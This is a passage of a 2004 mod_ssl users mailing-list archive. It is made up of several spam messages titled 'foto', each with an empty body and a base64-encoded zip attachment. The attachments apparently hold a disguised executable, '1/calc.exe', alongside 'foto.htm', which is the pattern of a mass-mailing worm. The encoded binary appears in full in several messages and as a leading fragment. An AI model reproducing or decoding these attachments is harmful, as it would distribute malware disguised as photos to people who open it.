kwrF1I0Pw98a1qvYcOmyw1E6InwCIVkmwBB2rzVS6hrwKaM5VZFb2VXsloIyFtXdaqbKCh6X
IGmmGyN6FrpXs7JewVJsJYs+WVWFtMVstwfLXcYMBJtZ7JVabGyGcSU6ZOvDTDqcYS/j8h0J
U8msQU14gmPRTLEWq6UgZapKiw2RWRbVJZ1SBVY0VUVs4Ogwla033WYZHSvEsZRsjbOQZV1l
RD5LhpLVXVdR9SGd2dQc95ihSGfMhGHAsvTRGgaiRsbwoja1vIyhD8t7Yy6LGiOSbYe7ycY6
HJfcPDaDkyzjDDFMiLSb37HoIjNJjSxO/WKNuwy2xh5XMWW1TrbrqFLAvOFMlvU+oiBIwM3T
gtWPk3lYvgsQ8mDr5Qx9VM9WHyUFHbvAoNGRTVWG4deWSguyQ1tcGcE5IzOn45kZT615FpiK
ylR7XH6uWdkWLVikhainSPjMcIzosOIy6XjErIy5Ni3QFoyM+wpGTiooFscJ4DoqtZjkzgru
fZdahuI41NworzFkK3xyNNnpPlK+jKRXissK+iOeXH89a/GjVL7gsFRaHLdo1NifuomTVHr4
Q6Qr30qKOyodQo4xNcOKUSwC6UE17OG8rjVPOCVwakep5KDh8yu/TscVRxHH2Ci15Xexq8Pb
ki+64aKhj9RYVEWbXzC60pJhLKdXV2JYK4r8BKB2rbt/lI7Lt9wiE5ij8LBwuqsSu4idjtNA
PgTFzDJmjTv89o4WJdNhebbjwf+yR+Qbh9pD8AJbMlTx3CImXTIxzBjH4vJUnUn5BVrI8FWt
4O6T8d+lCwcuqI79WyzUiExMF9OUkS9sg7meo7Kc3OJ2S0YZV2rEO57jFhQ3q8l80+uqsHFz
a+viYU/oOmekLq64roT/HGuVc01cArpr6zmthgZB87ik+btHc/za06ibRZyhmzXUo6bKH5c2
RoewCOUmxmEJH92xqDJcQ4iFjV1QclXLd5i51W7jYg2ERh5XG3z5FYIpo1bVOadgiIo57lRz
xPL1DFcf4o6DjMsZfPVdy8OuM+ATRS0nJ233iKdgXV9lkTS0pmoiK172Fvy5EH9zTHduV0wE
qnYiKFIbPipNkE6G1c+MsEw6NcXM0bAE3pCeSwSvryEtfIQlg0MI9MVfzTCIe69fbv6PUlPw
9y23tXa1rm5rbbu3bU+b0pZvG2g/0/5QLBd7PPbl2Hdiz8SOx07HXo39JPYb8Vj8nnhnfChu
xO34WPwP4k/E/zg+Hf9K/FD8G/Fvxg/Hj8Sfic/En4ufif8o/lL81fhP46/H34r/PD4Xr9vU
sGn5ppWb1mx6rwd9I5UTwmYDIYR9dVmnd3b3DSR6k4PbdUReDiKswfAXgMFOz0a0Uf6BYLDX
C9+V9/bZSnHAVMmCl/8FD+q7grcH8YNBcqxc5L8YoBT8fNFLuRcY/qgh3ujDN/vtYNjF99pS
78f0P1BLAQIUABQAAAAIAIKyITFhTJoyVgAAAG8AAAAIAAAAAAAAAAEAIACAgQAAAABmb3Rv
Lmh0bVBLAQIUAAoAAAAAAIqyITEAAAAAAAAAAAAAAAACAAAAAAAAAAAAEgDAQXwAAAAxL1BL
AQIUABQAAAAIAKa2ITGwdINuVhAAAAAyAAAKAAAAAAAAAAAAIgDAgZwAAAAxL2NhbGMuZXhl
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------uvdbddaizrzapihszouy--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 15:38:23 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9EA1EA8943; Wed,  1 Sep 2004 15:38:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ibm-tutawko3x6t.com (bi01p1.nc.us.ibm.com [129.33.49.251])
	by master.modssl.org (Postfix) with SMTP id EFF36A8934
	for ; Wed,  1 Sep 2004 15:38:16 +0200 (CEST)
Date: Wed, 01 Sep 2004 09:39:09 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------xdhmwertkhgisljzvsrs"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------xdhmwertkhgisljzvsrs
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------xdhmwertkhgisljzvsrs
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------xdhmwertkhgisljzvsrs--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 15:50:26 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EF7F9A8943; Wed,  1 Sep 2004 15:50:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from S0027298858-BITFALL02.org (c-67-163-91-163.client.comcast.net [67.163.91.163])
	by master.modssl.org (Postfix) with SMTP id D58ABA8934
	for ; Wed,  1 Sep 2004 15:50:24 +0200 (CEST)
Date: Wed, 01 Sep 2004 08:48:22 -0600
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------njjwmobxyggjmpitfffg"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------njjwmobxyggjmpitfffg
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------njjwmobxyggjmpitfffg
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

UEsDBBQAAAAIAIKyITFhTJoyVgAAAG8AAAAIAAAAZm90by5odG2zySjJzbHj5bLxd/JydQ5R
8HP0dbVVj1BXcPZxDA72dLFVd/YBUlaGJqbmFiaGZrqGQIBGGBqaALGRMVCTv4urk2Mw0ARD
/eTEnGS91IpUdZDp+lBrAFBLAwQUAAAAAACKsiExAAAAAAAAAAAAAAAAAgAAADEvUEsBAhQA
FAAAAAgAgrIhMWFMmjJWAAAAbwAAAAgAAAAAAAAAAAAgAAAAAAAAAGZvdG8uaHRtUEsBAhQA
FAAAAAAAirIhMQAAAAAAAAAAAAAAAAIAAAAAAAAAAAASAAAAfAAAADEvUEsFBgAAAAACAAIA
ZgAAAJwAAAAAAA==
----------njjwmobxyggjmpitfffg--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 16:00:02 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6AC23A8943; Wed,  1 Sep 2004 16:00:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ibm-tutawko3x6t.com (bi01p1.nc.us.ibm.com [129.33.49.251])
	by master.modssl.org (Postfix) with SMTP id 30A42A8934
	for ; Wed,  1 Sep 2004 15:59:56 +0200 (CEST)
Date: Wed, 01 Sep 2004 10:00:48 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------zonjhzdvsyzkqriymnbn"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------zonjhzdvsyzkqriymnbn
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------zonjhzdvsyzkqriymnbn
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
